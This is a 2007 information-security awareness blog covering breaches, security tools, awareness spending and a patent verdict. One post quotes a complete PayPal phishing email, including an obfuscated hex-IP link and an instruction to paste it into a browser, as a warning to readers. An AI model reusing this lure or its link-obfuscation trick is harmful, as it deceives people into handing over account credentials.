Welcome to NBlog, the NoticeBored blog

Feb 26, 2007

Google Hacking for Penetration Testers by Johnny Long is a terrifying book if you are a slightly paranoid information security professional at a major corporation. You'll soon be avidly turning the pages with a growing look of shock and fear on your face, gripped by the unfolding horror story. Google Hacking puts the spotlight firmly on those dark places that many security managers fear to tread: firewall, IDS and IPS configurations, security patching practices, web application security ... need I say more?

If you know someone who thinks antivirus software makes them immune to malware, perhaps our latest awareness module will help you change their mind. There is more to malware than viruses, and antivirus software only partially addresses one class of malware threats.

Since we last put out this core module a year ago, spyware, rootkits and Trojan have become increasingly prominent and problematic while viruses and worms are fading gradually into the background cosmic noise of the Internet (... of course, that could be 'famous last words'! There is still no shortage of widespread security vulnerabilities and zero day exploits to worry about).

George Spafford wrote "there are a number of behaviors that can dramatically increase the odds of human error yet organizations fail to manage them". He identifies a wide range of factors that make human errors more likely including: complexity; deadlines; fatigue; multitasking; poor planning; insufficient testing; lack of change management ... and many more (just read George's paper and I'm sure you will think of more).

George continues, "some organizations may have multiple behaviors that when combined further increase risk levels. Organizations must take a careful look at their culture and processes to understand and subsequently manage the level of human error being introduced." 'Taking a look at' culture and processes is easy enough but changing them (especially the culture) is a different matter entirely. That said, George's list of issues implies a whole load of options for those willing to take up the challenge.

Until March 5th, EDPACS has given free access to 10 years' worth of information security articles. EDPACS is the world's longest running IT audit newsletter - this is its 35th year! It has ~24 pages each month on audit, governance, control and security topics. I agree with Mich Kabay's assessment of the EDPACS archive as a treasure trove. The new EDPACS editor, Dan Swanson, is on the lookout for good articles on emerging issues and practical solutions: send any article proposals to dswanson_2005@yahoo.com

Feb 24, 2007

It's been a full-on blogging day. Here's a little security awareness nugget for all you hungry SQL programmers Out There:

sqlmap is an automatic blind SQL injection tool, developed in python, capable to perform an active database fingerprint, to enumerate entire remote database and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

A new research study shows that the US Government is spending just 2½% of its impressive $5.6 billion annual IT security budget on security awareness and training. With 6-10 million employees, that's between $14 and $25 per person per year, on average. The study's authors expect the spending to remain flat through 2012, although they acknowledge that security incidents tend to spur further investment.

Hello Mr Bush! Helloooo! NIST, your very own internationally-respected standards body, advises that information security awareness, training and education helps avoid or minimize security incidents. Are you asleep at the wheel or just gently dozing?

A federal jury in San Diego has ordered Microsoft to pay $1.5 billion to Alcatel-Lucent in a patent dispute over MP3 audio technology used in Windows. In its verdict, the jury assessed damages based on each Windows PC sold since May 2003. The case could have broader implications, should Alcatel-Lucent pursue claims against other companies that use the widespread MP3 technology. An Alcatel-Lucent representative praised the ruling.

"Praised the ruling" hardly seems to do it justice. It's not every day your company makes $1.5bn from its IPR!

The jury decision is certainly not the end of the matter. The article in cNet News points out parallel patent disputes involving Lucent and Microsoft. With such huge sums at stake, the IP lawyers are having a field day.

It seems we have a lot in common with Luis Navarro of Symantec in relation to security awareness. Writing in SC Magazine, Luis lays out the key parameters and objectives for security awareness programs including:- Justifying it to senior management via a business case;- Planning (and hopefully delivering) the program in conjunction with various functions within the organization;- Making the progam delivery 'continuous' not 'one-time' or 'discrete';- Addressing everyone from top to bottom of the organization, including 'management';- Measuring awareness and (implicitly) using the results to improve the program;- Assessing the security environment to identify aspects needing more awareness;- Promoting awareness of policies and responsibilities (since "investing time and money into securing the organization and its customers can be completely undermined if employees don’t understand their role in the security plan.");- Delivering the program effectively, sensitive to the audience's needs.

For such a short article, Luis has done a good job to summarize a sound approach to information security awareness. The only significant element I can see missing is the need for security awareness, training and education for IT professionals: if we expect our IT gurus to build, manage and maintain security IT systems and networks for the organization, surely we need to make sure they have a good understanding of the objectives and practices of information security? Information security is extremely important to many more IT pro's than those working in the Information Security Management Team, yet few organizations seem to appreciate this. Perhaps they just assume that IT pro's have already been trained in infosec, and that they are well motivated to make their systems secure? Sadly, in my experience, this is simply not true, meaning that this is a common corporate blind-spot.

Feb 23, 2007

The former head of Moscow City Bank which collapsed in 1994 has been jailed for masterminding a massive identity theft scheme involving fraud, aliases, conspiracy and theft. The fact that fellow Russian conspirators were also convicted points towards organized crime - way above the level of petty theft by lone hi-tech criminals.

A database hacking incident at TJX has evidently exposed bank card and drivers’ license details of millions of customers at its American, Canadian and Perto Rican TK Maxx and other stores. The systems appear to have been hacked as far back as July 2005, some 18 months before the incident was discovered. [Generally speaking, credit card database hackers often kill the goose that lays the golden eggs by exploiting so many cards that they are traced back to the hacked originator in much less than 18 months. Perhaps the TJX hackers only recently obtained sufficient information to exploit, or perhaps they are true hackers not crackers, in other words they were driven by curiosity not malice and greed. This story is still unfolding.]

A glitch in Flickr's database processing resulted in the occasional presentation of random pictures from the cache rather than the ones requested. No doubt some of the pictures were quite a surprise to customers expecting to see their holiday snaps. A red-faced explanation and apology is a shining example of the value of coming clean after an incident, although personally I would have liked more information about the technical issues.

Feb 20, 2007

A comment in the latest CISO Handbook newsletter about the RSA conference caught my eye this morning:

The third factor, and maybe the most important, is that most security professionals are fixated on solving security issues solely with technology. The number of vendors at RSA that were addressing physical elements of security were scarce, and anyone addressing the sociological elements of security were nowhere to be found (except one that does not count because they solve the problem with an appliance). Technology cannot solve every security issue, all it does is create an imbalance in a company’s security program that leads to a false sense of security (Pardon the pun).

RSA is, almost by definition, a technical forum but at the risk of becoming boring, I'll say yet again that information security cannot be 'solved' by technology alone. As long as people are part of the problem, they will inevitably be part of the solution. Security awareness, training and education, coupled with readable policies, usable procedures and helpful guidelines, are essential parts of the information security jigsaw puzzle. So too are management understanding and support ('walking the talk') and a thoroughness of approach by the infosec professionals. Those who are defending the castle must remember that the advancing hordes need only find and exploit one chink in each layer of our defenses.

Perhaps we should repackage and gloss-up our own security awareness services as a 'technology solution'? "Click here to download security awareness 2.0, the all new information security control system."? I guess not.

Feb 8, 2007

Scuba by Imperva is a free, lightweight Java utility that scans Oracle, DB2, MS-SQL, and Sybase databases for known vulnerabilities and configuration flaws. Based on its assessment results, Scuba creates clear, informative reports with detailed test descriptions. Summary reports, available in Java and HTML format, illustrate overall risk level. With Scuba by Imperva, you are quickly on your way to meeting industry-leading best practices for database configuration and management.

The phishers are constantly searching for new wrinkles to fool their victims. Here's a new one on me: as well as the usual request to 'click the link below' to 'verify your identity', victims are invited to cut-and-paste the URL into their browsers, playing on the well-meaning security advice to that effect.

Dear PayPal Account Holder,

We recently noticed one or more attempts to log in to your PayPal Online account from a foreign IP address and we have reasons to belive that your account was hijacked by a third party without your authorization.

If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you. However, if you are the rightfull holder of the account, click on the link below, fill the form and then submit as we try to verify your identity.

Message ID Nr: 0xD2.0xBC.0xDA37

Please click here to verify your PayPal account.

or copy and paste 0xd2.0xbc.0xda.0x37/signin.paypal.com/0xd7/ into your Internet Browser.

Be aware that until we can verify your identity no further access to your account will be allowed and we will have no other liability for your account or any transactions that may have occurred as a result of your failure to upgrade your account as instructed above.

An unusual article in CSO Magazine concerns the theft of copper wires (and sometimes fiber optics!) due to a peak in the global price of copper. Thieves are literally risking their lives to steal power cables.

Feb 7, 2007

A database application error (presumably) led to a customer of HBOS (Halifax Bank of Scotland) being sent 75,000 statements for other customers when she requested hers.

Ms McLaughlan, of Netherkirkgate, Aberdeen, said: "I sent away for my bank statements to get a refund on some bank charges. A couple of days later these five packages turned up at my door and they were filled with people's names, credit numbers, what they had paid in, and had taken out every day. The details started from April 2003 and there was also the total of the bank's overdraft."

This is exactly the kind of gross error that output validation is meant to detect and stop. Whilst it is vaguely conceivable that someone may legitimately request such a huge number of statements, the chances are remote enough to make this an exceptional request that can be flagged and held pending human intervention. Of course, it is also quite possible that the HBOS systems did indeed flag this one and someone mistakenly released the output. Doh!

Here are just two of this week's stories about the theft of IT systems holding unencrypted databases of personal data.

Firstly, the US Department of Veterans Affairs ("the VA") has reported a portable hard drive containing personal data on vets lost, presumed stolen. A laptop computer containing the social security numbers of 26.5 million veterans was stolen from a VA official's home last May and another computer containing personal information on up to 38,000 veterans went missing last August. The VA is belatedly installing encryption software on its laptops at least, if not also its portable drives and desktops.

Secondly, a US accountant's stolen PC contains details of 800 clients for whom she had prepared tax returns. The thieves appear to have targeted the PC specifically since they left behind cash and checks.

Feb 2, 2007

We have just released a brand new awareness module on database security for February. The risks and controls associated with database security make for a fascinating security awareness subject.

For IT professionals, the module contains: - A risk analysis (available in the NoticeBored newsletter) - A PowerPoint presentation giving an overview of database security technologies - A white paper describing database security controls in more depth - A controls matrix categorizing database security controls into preventive, detective and corrective classes on one axis, and confidentiality, integrity and availability on the other - And a checklist to guide a systematic review of database security controls.

For the general staff audience, the non-technical posters, seminar slides, screensavers, case study, crossword and other awareness materials highlight personal perspectives on database security, for example when database breaches lead to the exposure of personal data.

Finally, we present the governance aspects of database security to management through mind maps, agendas, PowerPoint slides and briefing papers. Managers need to be aware of the legal and regulatory implications of database security failures. The generic business case for database security controls provides a solid background for managers to assess the security aspects of database development project proposals, and the metrics paper suggests a range of ways in which they can keep an eye on their investments in database security.

"More and more government agencies post public records online, making a startling amount of information available. With a little amateur sleuthing, you can peek into the backgrounds of the people you let into your life -- a nanny or housekeeper, an online acquaintance, a potential business partner -- and be reasonably satisfied they're not predators or crooks." The Seattle Times piece It's never been easier to be your own detective goes on to explain how easy it is to conduct background checks online, whether using do-it-yourself web search techniques or paying a few dollars for others to check on your behalf. While most database records are legitimately placed in the public domain in this fashion, it is equally possible that supposedly private databases could be hacked and end up on underground websites somewhere. The article also makes the point that you cannot necessarily trust everything you read online. Quite apart from the possibility of finding information about someone else with similar details to the person you are checking, the information available online is only as good as that stored in the database.

Hot topic

NBlogger is ...

Dr Gary Hinson PhD MBA CISSP has an abiding interest in human factors - the ‘people side’ as opposed to the purely technical aspects of information security. Gary's career stretches back to the mid-1980s as both practitioner and manager in the fields of IT system and network administration, information security and IT auditing. He has worked and consulted in the pharmaceuticals/life sciences, utilities, IT, engineering, defense, financial services and government sectors, for organizations of all sizes. Since 2003, he has been creating security awareness materials for clients (www.NoticeBored.com) and supporting users of the ISO27k standards (www.ISO27001security.com). In conjunction with Krag Brotby, he wrote "PRAGMATIC security metrics" (www.SecurityMetametrics.com). He is a keen radio amateur, often calling but seldom heard by distant stations on the HF bands.